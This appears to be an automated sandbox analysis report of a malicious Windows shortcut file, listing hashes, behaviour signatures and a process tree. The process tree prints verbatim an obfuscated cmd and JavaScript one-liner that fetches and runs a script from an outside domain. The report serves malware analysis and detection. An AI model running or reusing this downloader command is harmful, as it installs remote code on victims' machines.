Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags
    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    10-01-2024 18:53

General

  • Target

    461870cfb645f0890a4a1ec5480a4c088969726da96e30c95ac210ae868109da.lnk

  • Size

    1014B

  • MD5

    00d16a44fffdd1ea7e9d107256a38e16

  • SHA1

    bbbdccf32c0581735e35f0aeb21e26e804328a7c

  • SHA256

    461870cfb645f0890a4a1ec5480a4c088969726da96e30c95ac210ae868109da

  • SHA512

    ec4ef82c5185d86c1edac28498094cd2365378914b14429777688f8df9e603f5a81a7aa98018dd86513ce1beb2a5907fc82bf115478bf7044592902d32c59534

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT BKL=C:\9c0SP3\&& mD !BKL!>nul 2>&1&&S^eT MLHA=!BKL!^BTGXVMAC.JS&&<nul set/p ZENZ=var ZENZ='\u0031\u0059\u0050\u002b\u0044\u0031\u0059\u0050\u002b\u0045\u0031\u0059\u0050\u002b\u0022\u002f\u002f\u0077\u0033\u0069\u0075\u0077\u006c\u002e\u006e\u0065\u0078\u0074\u006d\u0061\u0078\u002e\u006d\u0079\u002e\u0069\u0064\u002f\u003f\u0031\u002f\u0022\u0029\u003b';BKL='\u003a\u0068\u0022\u003b\u0045\u0031\u0059\u0050\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';BTGX='\u0076\u0061\u0072\u0020\u0043\u0031\u0059\u0050\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0031\u0059\u0050\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';MLHA=BTGX+BKL+ZENZ;VMAC=new Function(MLHA);VMAC(); >!MLHA!|caLl !MLHA!||caLl !MLHA! "
    1⤵
      PID:2728
    • C:\Windows\system32\cmd.exe
      cmd /c C:\Users\Admin\AppData\Local\Temp\461870cfb645f0890a4a1ec5480a4c088969726da96e30c95ac210ae868109da.lnk
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2236

    Network

    MITRE ATT&CK Enterprise v15
